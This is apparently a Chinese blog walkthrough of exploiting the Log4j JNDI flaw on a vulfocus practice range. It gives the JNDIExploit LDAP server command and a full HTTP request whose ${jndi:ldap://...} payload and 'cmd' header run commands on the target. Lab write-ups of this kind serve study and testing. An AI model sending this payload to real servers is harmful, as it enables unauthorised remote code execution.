前言
關於這個漏洞,啥都不用說了,直接發車。
工具下載
JNDIExploit:https://github.com/0x727/JNDIExploit
復現過程
-
啟動靶場環境
直接用vulfocus啟一個環境。
官網地址:http://vulfocus.fofa.so/
沒注冊的先注冊,進來首頁即可看到靶場
-
用JNDIExploit啟一個ldap的服務。
-
命令如下:
java -jar JNDIExploit-1.3-SNAPSHOT.jar -l 1234 -p 8988 -i 0.0.0.0
-
接着將payload更改如下:
payload=$注意Content-Type的類型為:application/x-www-form-urlencoded
在請求頭中添加cmd字段,后面跟上需要執行的命令即可。完整數據包如下:
POST /hello HTTP/1.1 Host: vulfocus.fofa.so:41624 Content-Type: application/x-www-form-urlencoded cmd: whoami Content-Length: 47 payload=${jndi:ldap://1.2.3.4:1234/TomcatBypass/TomcatEcho}
成功回顯命令:
后記
本文章僅為學習交流,請勿利用從事非法滲透測試,否則后果自負,與本人無關。
本漏洞推薦使用公開靶場或自己搭建環境進行復現和研究,但切忌進行未授權測試。